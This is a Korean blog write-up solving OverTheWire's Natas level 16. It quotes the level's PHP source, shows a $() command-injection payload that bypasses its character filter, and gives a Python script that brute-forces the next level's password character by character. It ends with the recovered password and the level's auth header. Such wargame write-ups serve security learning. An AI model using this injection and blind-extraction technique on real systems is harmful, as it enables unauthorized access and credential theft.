: level 15 → level 16
http://natas16.natas.labs.overthewire.org
위 사진은 natas 16의 시작화면이다. 제일 먼저 소스코드를 살펴보자.
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas16", "pass": "<censored>" };</script></head>
<body>
<h1>natas16</h1>
<div id="content">
For security reasons, we now filter even more on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>
Output:
<pre>
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
if(preg_match('/[;|&`\'"]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i \"$key\" dictionary.txt");
}
}
?>
</pre>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>입력한 값을 $key에 저장하고 있고, preg_match로 각 문자를 필터링하고 있다.
필터링을 우회하면 passthru로 외부명령을 사용하고 있는 것을 알 수 있다. 지난번처럼 grep 정규표현식 ^를 사용해서 풀어보도록 하겠다.
나는 $()을 통해서 외부명령을 실행했고, SQL Blind Injection처럼 pw를 한 자리씩 알아내고자 했다.
다음과 같이 작성한 것을 URL인코딩해서 자동화프로그램으로 만들었다.
$(grep ^pw /etc/natas_webpass/natas17 dictionary.txt)&submit=Search
import socket
pw=''
for i in range(1, 33):
for ch in range(48, 123):
if 58 <= ch <=64: continue
if 91 <= ch <=96: continue
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("176.9.9.172", 80))
header = "GET /"
header += "?needle=%24%28grep%20%5E" + pw + chr(ch) + "%20/etc/natas_webpass/natas17%20dictionary.txt%29&submit=Search "
header += "HTTP/1.1\r\n"
header += "Host:natas16.natas.labs.overthewire.org\r\n"
header += "Authorization: Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA==\r\n"
header += "\r\n"
response=" "
sock.send(header.encode())
response = sock.recv(65535)
response = response.decode()
if not("African" in response):
pw += chr(ch)
print(pw)
break
sock.close()
print(pw)실행결과는 다음과 같다.
natas17 password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
'Study > Web Hacking' 카테고리의 다른 글
| [LOS] troll (0) | 2021.06.27 |
|---|---|
| [natas] Level 16 -> Level 17 (0) | 2021.06.27 |
| [XSS Challenge] Stage #14 (0) | 2021.05.30 |
| [XSS Challenge] Stage #13 (0) | 2021.05.30 |
| [LOS] orge (0) | 2021.05.30 |